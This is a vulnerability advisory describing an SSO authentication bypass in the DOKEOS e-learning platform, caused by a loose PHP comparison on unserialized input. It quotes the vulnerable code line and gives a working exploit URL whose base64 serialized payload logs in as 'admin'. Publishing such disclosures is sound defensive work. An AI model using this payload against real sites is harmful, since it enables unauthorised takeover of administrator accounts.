SSO Authentication Bypass and Website Takeover in DOKEOS

High-Tech Bridge Security Research Lab discovered a high-risk vulnerability in a popular e-learning software DOKEOS. A remote unauthenticated attacker can bypass authentication process and login to the vulnerable website with an arbitrary account (including administrator's one). Successful exploitation requires Single Sign-On (SSO) authentication to be enabled.

The vulnerability is caused by variable type confusion error when comparing password hash to unserialized string during authentication process, when SSO authentication is enabled (sso_authentication=true). In this case, the application uses HTTP GET "sso_cookie" parameter to pass base64-encoded login and password and then calls 'unserialize()' PHP function on received data.

Below is an example of vulnerable code, which erroneously uses the "==" operator to compare two strings (instead of the "===" operator):
if ($sso['secret'] == sha1($uData['password']) && ($sso['username'] == $uData['username'])) {

In this case, SHA1 password hash is compared to $sso['secret'] string, controlled by the attacker. If attacker passes Boolean true instead of the real password, he can successfully bypass the authentication and login under arbitrary web application account.

A simple exploit below can be used to authenticate under "admin" account:
http://[host]/index.php?loginFailed=1&sso_referer=&sso_cookie=YToyOntzOjg6In VzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjY6InNlY3JldCI7YjoxO30=

The "YToyOntzOjg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjY6InNlY3JldCI7YjoxO30=" string is translated from base64 into:
a:2:{s:8:"username";s:5:"admin";s:6:"secret";b:1;}

After the execution of 'unserialize()' function, we have the following array:
$sso['username'] = 'admin';
$sso['secret'] = true;